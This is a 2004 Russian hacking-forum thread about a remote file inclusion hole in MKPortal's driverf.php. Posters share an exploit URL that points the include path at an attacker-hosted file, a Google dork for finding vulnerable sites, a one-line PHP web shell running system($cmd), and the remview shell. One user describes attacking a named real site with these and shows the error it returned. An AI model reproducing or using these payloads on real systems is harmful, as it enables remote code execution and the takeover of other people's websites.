HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.07.2004, 00:39
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию

внимание! в 1.0.1а это уже исправили

файл http://[target]/mkportal/include/driverf.php содержит
что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'>

эксплойт:
http://[target]/mkporta....TH=http

где:
http://[hacker_site]/conf_global.php
любой php код

http://www.google.ru/search?....%BA&lr=
 
Ответить с цитированием

  #2  
Старый 21.07.2004, 00:50
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

пхп-шная инъекция ?
Довольно частый случай:
http://www.site.ru/index.php&amp;se=сайт_с_кодом&amp;cmd=К оманды
 
Ответить с цитированием

  #3  
Старый 21.07.2004, 00:55
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
С нами: 11893346

Репутация: 45


По умолчанию

Хотелось бы добавить, что &quot;сайтом с кодом&quot; может являться любой сайт на народе со страничкой следующего содержания:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<PRE>
<H4>
<? system($cmd); ?>
</H4>
</PRE>
[/QUOTE]<span id='postcolor'>
Н-р: http://www.shutnicok.narod.ru/xak.php
 
Ответить с цитированием

  #4  
Старый 21.07.2004, 01:11
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
С нами: 11540434

Репутация: 82
По умолчанию

кстати как видно из запроса в google
этот движок неплохо распостранился


интересно сколько на народе вот таких сайтов с загадочными файлами *.php =)
 
Ответить с цитированием

  #5  
Старый 11.10.2004, 19:06
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
С нами: 11357243

Репутация: 0
По умолчанию

Блин, пишет вот что:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'>
 
Ответить с цитированием

  #6  
Старый 11.10.2004, 19:16
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
С нами: 11357243

Репутация: 0
По умолчанию

А запрос делаю такой:
http://galassia.altervista.org/mkporta....TH=http
 
Ответить с цитированием

  #7  
Старый 11.10.2004, 19:28
PhreakeR
Новичок
Регистрация: 11.10.2004
Сообщений: 5
С нами: 11357243

Репутация: 0
По умолчанию

и ещё я загрузил remview на narod и переименовал в conf_global.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.